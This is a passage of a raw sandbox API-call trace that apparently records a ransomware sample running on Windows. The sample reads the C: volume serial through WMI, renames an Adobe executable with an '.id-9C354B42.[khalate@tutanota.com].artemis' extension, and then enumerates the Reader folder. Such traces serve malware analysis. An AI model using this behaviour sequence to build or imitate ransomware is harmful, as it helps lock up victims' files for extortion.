ppvObject=0x6cede78 | out: ppvObject=0x6cede78*=0x781c44) returned 0x0 [0167.568] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781c44, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede80 | out: pCid=0x6cede80*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.568] WbemLocator:IUnknown:Release (This=0x781c44) returned 0x3 [0167.568] CoGetContextToken (in: pToken=0x6ceded8 | out: pToken=0x6ceded8) returned 0x0 [0167.568] CoGetContextToken (in: pToken=0x6cee2e0 | out: pToken=0x6cee2e0) returned 0x0 [0167.568] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee370 | out: ppvObject=0x6cee370*=0x781ccc) returned 0x0 [0167.568] WbemLocator:IRpcOptions:Query (in: This=0x781ccc, pPrx=0x781ce4, dwProperty=2, pdwValue=0x6cee398 | out: pdwValue=0x6cee398) returned 0x80004002 [0167.568] WbemLocator:IUnknown:Release (This=0x781ccc) returned 0x3 [0167.569] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x2 [0167.569] CoGetContextToken (in: pToken=0x6cee8b8 | out: pToken=0x6cee8b8) returned 0x0 [0167.569] CoGetContextToken (in: pToken=0x6cee818 | out: pToken=0x6cee818) returned 0x0 [0167.569] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x6cee8e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee8e4 | out: ppvObject=0x6cee8e4*=0x672f04c) returned 0x0 [0167.569] WbemLocator:IUnknown:AddRef (This=0x672f04c) returned 0x4 [0167.569] WbemLocator:IUnknown:Release (This=0x672f04c) returned 0x3 [0167.569] WbemLocator:IUnknown:Release (This=0x672f04c) returned 0x2 [0167.569] SysStringLen (param_1=0x0) returned 0x0 [0167.569] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738af0, puCount=0x6ceec7c | out: puCount=0x6ceec7c*=0x0) returned 0x0 [0167.569] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec78*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec78*=0x20, pszText=0x0) returned 0x0 [0167.569] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.569] CoGetContextToken (in: pToken=0x6cee8e8 | out: pToken=0x6cee8e8) returned 0x0 [0167.569] WbemLocator:IUnknown:AddRef (This=0x781ce4) returned 0x3 [0167.569] WbemLocator:IUnknown:QueryInterface (in: This=0x781ce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee77c | out: ppvObject=0x6cee77c*=0x781ce4) returned 0x0 [0167.569] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x3 [0167.569] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x2 [0167.569] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec80*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec80*=0x20, pszText=0x0) returned 0x0 [0167.569] WbemDefPath:IWbemPath:GetText (in: This=0x6738af0, lFlags=2, puBuffLength=0x6ceec80*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec80*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.570] IWbemServices:GetObject (in: This=0x672f04c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceec34*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceec34*=0x673b798, ppCallResult=0x0) returned 0x0 [0173.601] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738b60, puCount=0x6ceec34 | out: puCount=0x6ceec34*=0x2) returned 0x0 [0173.601] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0xf, pszText=0x0) returned 0x0 [0173.601] WbemDefPath:IWbemPath:GetText (in: This=0x6738b60, lFlags=4, puBuffLength=0x6ceec30*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceec30*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0173.601] IWbemClassObject:Get (in: This=0x673b798, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceec30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3631580*=0, plFlavor=0x3631584*=0 | out: pVal=0x6ceec30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3631580*=8, plFlavor=0x3631584*=0) returned 0x0 [0173.601] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.601] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.602] IWbemClassObject:Get (in: This=0x673b798, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceec38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3631580*=8, plFlavor=0x3631584*=0 | out: pVal=0x6ceec38*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3631580*=8, plFlavor=0x3631584*=0) returned 0x0 [0173.602] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.602] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.602] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe", nBufferLength=0x105, lpBuffer=0x6cee838, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\far.exe", lpFilePart=0x0) returned 0x24 [0173.602] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee838, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\far.exe.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x4f [0173.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec98) returned 1 [0173.602] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\far.exe" (normalized: "c:\\program files (x86)\\adobe\\far.exe"), fInfoLevelId=0x0, lpFileInformation=0x6ceed14 | out: lpFileInformation=0x6ceed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1c72a30, ftCreationTime.dwHighDateTime=0x1d57e7b, ftLastAccessTime.dwLowDateTime=0x7d642d50, ftLastAccessTime.dwHighDateTime=0x1d5c9d2, ftLastWriteTime.dwLowDateTime=0x7d642d50, ftLastWriteTime.dwHighDateTime=0x1d5c9d2, nFileSizeHigh=0x0, nFileSizeLow=0x13a00)) returned 1 [0173.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec94) returned 1 [0173.602] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\far.exe" (normalized: "c:\\program files (x86)\\adobe\\far.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\far.exe.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\far.exe.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0173.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceedcc) returned 1 [0173.603] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0", nBufferLength=0x105, lpBuffer=0x6cee8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0", lpFilePart=0x0) returned 0x28 [0173.603] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", nBufferLength=0x105, lpBuffer=0x6cee8a8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\", lpFilePart=0x0) returned 0x29 [0173.603] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*", lpFindFileData=0x6ceeaf4 | out: lpFindFileData=0x6ceeaf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b3f0 [0173.604] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81ed8ae0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.617] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0x0, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0174.674] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="Berime.htm", cAlternateFileName="")) returned 1 [0175.162] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7ffe6ce0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7ffe6ce0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Esl", cAlternateFileName="")) returned 1 [0175.162] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0x0, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0175.162] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0175.162] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0175.162] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0x0, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0175.162] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4273, dwReserved0=0x0, dwReserved1=0x0, cFileName="LeiaMe.htm", cAlternateFileName="")) returned 1 [0175.162] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Liesmich.htm", cAlternateFileName="")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f82a560, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lisezmoi.htm", cAlternateFileName="")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Llegiu-me.htm", cAlternateFileName="LLEGIU~1.HTM")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x434e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LueMinut.htm", cAlternateFileName="")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83849600, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83849600, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader", cAlternateFileName="")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4176, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMe.htm", cAlternateFileName="")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3f71, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCS.htm", cAlternateFileName="")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3fa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCT.htm", cAlternateFileName="")) returned 1 [0175.163] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80815880, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4623, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeCZE.htm", cAlternateFileName="REE3F7~1.HTM")) returned 1 [0175.164] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x80861b40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHRV.htm", cAlternateFileName="RE2D2E~1.HTM")) returned 1 [0175.164] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4274, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeHUN.htm", cAlternateFileName="RE50AF~1.HTM")) returned 1 [0175.164] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x17b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeJ.htm", cAlternateFileName="")) returned 1 [0175.164] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4090, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeK.htm", cAlternateFileName="")) returned 1 [0175.164] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4444, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMePOL.htm", cAlternateFileName="RECE99~1.HTM")) returned 1 [0175.164] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4318, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUM.htm", cAlternateFileName="README~4.HTM")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4872, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeRUS.htm", cAlternateFileName="README~3.HTM")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x43b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeSKY.htm", cAlternateFileName="README~2.HTM")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4995, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadMeUKR.htm", cAlternateFileName="README~1.HTM")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x833608a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf66ca0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7cf66ca0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7cf66ca0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup Files", cAlternateFileName="SETUPF~1")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vigtigt.htm", cAlternateFileName="")) returned 1 [0175.165] FindNextFileW (in: hFindFile=0x77b3f0, lpFindFileData=0x6ceeb04 | out: lpFindFileData=0x6ceeb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41b2, dwReserved0=0x0, 